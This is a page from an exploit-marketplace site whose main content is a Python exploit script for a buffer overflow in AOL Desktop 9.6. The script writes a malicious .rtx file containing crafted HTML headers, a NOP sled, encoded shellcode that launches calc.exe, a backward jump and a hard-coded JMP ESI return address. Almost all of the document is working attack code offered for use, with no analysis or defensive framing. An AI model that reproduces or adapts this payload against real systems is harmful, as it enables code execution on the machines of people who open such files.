0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AOL Desktop 9.6 .rtx Buffer Overflow
[#!/usr/bin/python
# Vulnerable app: AOL Desktop 9.6
# Author: sickness
# Download : http://daol.aol.com/software/aoldesktop96/
# kudos to sup3r: http://www.exploit-db.com/exploits/16085/
# Tested : Windows XP Professional SP3 (EN) latest updates
# DATE : 02/02/2011
# NOTE: If exploit doesn't work turn AOL off (CTRL+ALT+DELETE and turn all AOL processes off) then try again
# DO NOT FORGET TO FEEL THE PWNSAUCE WITH: http://redmine.corelan.be:8800/projects/pvefindaddr
###################################################################
# You might need to change the offset.
# If you want a payload larger than 400 bytes, then you need to increase the negative jump
# Watch out for other bad chars !!
# Current bad chars: \x00\x0a\x0d\x20\x31\x90\x3e
###################################################################
# First Header
hd1 = ("\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a"
"\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41"
"\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22"
"\x20\x46\x41\x43\x45\x3d\x22\x41\x72\x69\x61\x6c\x22\x20\x4c\x41"
"\x4e\x47\x3d\x22\x30\x22\x3e\x3c\x41\x20\x48\x52\x45\x46\x3d\x22"
"\x68\x74\x74\x70\x3a\x2f\x2f")
# Second Header
hd2 = ("\x22\x3e\x74\x65\x73\x74\x3c\x2f\x41\x3e\x3c\x55\x3e\x3c\x42\x52"
"\x3e\x0d\x0a\x3c\x2f\x55\x3e\x3c\x2f\x46\x4f\x4e\x54\x3e\x3c\x2f"
"\x48\x54\x4d\x4c\x3e\x0d\x0a")
payload='\x90'* 4968 # 5368 until EIP overwrite - 400 bytes from the negative jump.
payload += '\x90'*16 # Some nops
# msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b '\x00\x0a\x0d\x20\x31\x90\x3e' -t c
payload +=("\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x17\x22\xfd\x6a\x83\xee\xfc\xe2\xf4\xeb\xca\x74\x6a\x17\x22"
"\x9d\xe3\xf2\x13\x2f\x0e\x9c\x70\xcd\xe1\x45\x2e\x76\x38\x03"
"\xa9\x8f\x42\x18\x95\xb7\x4c\x26\xdd\xcc\xaa\xbb\x1e\x9c\x16"
"\x15\x0e\xdd\xab\xd8\x2f\xfc\xad\xf5\xd2\xaf\x3d\x9c\x70\xed"
"\xe1\x55\x1e\xfc\xba\x9c\x62\x85\xef\xd7\x56\xb7\x6b\xc7\x72"
"\x76\x22\x0f\xa9\xa5\x4a\x16\xf1\x1e\x56\x5e\xa9\xc9\xe1\x16"
"\xf4\xcc\x95\x26\xe2\x51\xab\xd8\x2f\xfc\xad\x2f\xc2\x88\x9e"
"\x14\x5f\x05\x51\x6a\x06\x88\x88\x4f\xa9\xa5\x4e\x16\xf1\x9b"
"\xe1\x1b\x69\x76\x32\x0b\x23\x2e\xe1\x13\xa9\xfc\xba\x9e\x66"
"\xd9\x4e\x4c\x79\x9c\x33\x4d\x73\x02\x8a\x4f\x7d\xa7\xe1\x05"
"\xc9\x7b\x37\x7d\x23\x70\xef\xae\x22\xfd\x6a\x47\x4a\xcc\xe1"
"\x78\xa5\x02\xbf\xac\xd2\x48\xc8\x41\x4a\x5b\xff\xaa\xbf\x02"
"\xbf\x2b\x24\x81\x60\x97\xd9\x1d\x1f\x12\x99\xba\x79\x65\x4d"
"\x97\x6a\x44\xdd\x28\x09\x76\x4e\x9e\x44\x72\x5a\x98\x6a")
payload += '\x90'*(5368-len(payload))
payload += '\xe9\x70\xfe\xff\xff' # Jump back 400 bytes
payload += '\x90'*11
payload += '\xC0\xCF\xC5\x20' # Universal JMP ESI from [aolusershell.dll]
payload += '\x90'*(6000-len(payload))
exploit = hd1+payload+hd2
try:
file=open('exploit.rtx','w')
file.write(exploit)
file.close()
print 'File created, time to PEW PEW!\n'
except:
print 'Something went wrong!\n'
print 'Check if you have permisions to write in that folder, of if the folder exists!'
# 0day.today [2024-11-15] #